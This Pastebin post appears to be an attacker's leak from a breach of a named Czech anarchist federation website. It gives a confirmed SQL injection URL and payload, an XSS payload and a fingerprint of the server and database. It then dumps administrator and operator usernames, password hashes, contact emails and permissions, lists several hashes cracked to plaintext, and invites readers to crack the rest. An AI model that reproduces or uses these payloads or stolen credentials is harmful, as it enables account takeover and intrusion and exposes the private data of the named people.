Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /\ \ /\ \ /\ \ /\ \
- /::\ \ /::\ \ /::\ \ /::\ \
- /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \
- /:/ \:\ \ _\:\~\ \ \ /::\~\:\ \ /::\~\:\ \
- /:/__/ \:\__\ /\ \:\ \ \__\ /:/\:\ \:\__\ /:/\:\ \:\__\
- \:\ \ \/__/ \:\ \:\ \/__/ \/__\:\/:/ / \/__\:\ \/__/
- \:\ \ \:\ \:\__\ \::/ / \:\__\
- \:\ \ \:\/:/ / /:/ / \/__/
- \:\__\ \::/ / /:/ /
- \/__/ \/__/ \/__/
- *- Československá anarchistická federace -*
- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL : http://www.csaf.cz/teoria.php?teor_cl=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: teor_cl
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| Cross-site Scripting
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.csaf.cz/rss_adresa.php?'"--></style></script><script>alert(0x0006E3)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0006E3)</script>
- ||| [Possible] PHP Source Code Disclosure
- Severity: Medium
- Confirmation: Confirmed
- URL: http://www.csaf.cz/obrazky/MD4-log-584jpg
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- ||| Info db
- Target: http://www.csaf.cz/teoria.php?teor_cl=-1 OR 17-7=10
- Web Server: Apache/2.2.16 (Debian)
- Powered-by: PHP/5.3.21-1~dotdeb.0
- DB Server: MySQL
- Resp. Time(avg): 6703 ms
- Current User: csaf@localhost
- Sql Version: 5.1.58-1~dotdeb.1
- Current DB: csaf
- System User: csaf@localhost
- Host Name: csaf.cz
- Installation dir: /usr/
- DB User: 'csaf'@'localhost'
- Data Bases: information_schema, csaf
- |||
- csaf.phpadmin is 2
- login=csaf
- heslo=56813b460515ecb8 / stepik
- login=sstevko
- heslo=0d33a3ae54d3b59e / otpor
- |||
- csaf.admin is 1
- Data Found: login=lenka
- Data Found: heslo_new=e5a56cf0818d464cef1103f39babf57d
- |||
- csaf.Operatori is 12
- jmeno=-fk-
- heslo=2074516a7196a34df7a05e7f4c157ac9
- aktivni=1
- operatori_id=pedestre
- kontakt=pedestre@csaf.cz
- help=0
- prava=:fsechna:
- jmeno=-ll-
- heslo=2b8e6d0e60ae7da93e4fe214d2781f2e
- aktivni=0
- operatori_id=gaston
- kontakt=
- help=1
- prava=:distro_cz:
- jmeno=[e]
- heslo=81174b6e3e394a23d91028074a067a98
- aktivni=1
- operatori_id=egil
- kontakt=
- help=1
- prava=:edit:edit_cizi:
- jmeno=dsa
- heslo=8fd0cd9c7a4456b25f1dc344add6d7e4
- aktivni=0
- operatori_id=testerek
- kontakt=
- help=1
- prava=:edit:edit_cizi:distro_cz:pokrocile:doc:linky:
- jmeno=gege
- heslo=2846f194dd0235954bb9ddb6af53f0c8
- aktivni=0
- operatori_id=druhy_tester
- kontakt=sulinek@sourek.sk
- help=1
- prava=:
- jmeno=Kovac
- heslo=18df8b4a321e13de1590f52cab122220
- aktivni=0
- operatori_id=kovac
- kontakt=
- help=1
- prava=:edit:edit_cizi:distro_cz:doc:linky:
- jmeno=Krystufek
- heslo=3fc9acc73318b183e643b765d2f9404c
- aktivni=0
- operatori_id=krystufek
- kontakt=
- help=1
- prava=:edit:edit_cizi:linky:
- jmeno=O.H.
- heslo=3f7c4756e067384eb19e87dcff2baec9
- aktivni=1
- operatori_id=stanislav.rubes
- kontakt=zadam@si.mail
- help=1
- prava=:edit:edit_cizi:distro_cz:pokrocile:doc:linky:
- jmeno=Ond?ej
- heslo=bf0f350c72874e8c10eab29603c6eb3f
- aktivni=0
- operatori_id=honza
- kontakt=
- help=1
- prava=:distro_cz:
- jmeno=Tar
- heslo=25f09991694a8149d44d708c510c99c1
- aktivni=0
- operatori_id=roza
- kontakt=
- help=0
- prava=:edit:distro_cz:linky:
- jmeno=xmstislavx
- heslo=c7287236dc984656f0598070ea69b3b4
- aktivni=0
- operatori_id=mstislav
- kontakt=zadam@si.mail
- help=1
- prava=:edit:
- jmeno=xsvatoplukx
- heslo=73bcaaa458bff0d27989ed331b68b64d
- aktivni=1
- operatori_id=svatopluk
- kontakt=csaf.ostrava@gmail.com
- help=1
- prava=:edit:edit_cizi:distro_cz:
- |||
- 3f7c4756e067384eb19e87dcff2baec9 is 852456
- 73bcaaa458bff0d27989ed331b68b64d is iddqd
- 18df8b4a321e13de1590f52cab122220 is jo98ska
- In the next decoding md5 strings can anyone continue :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement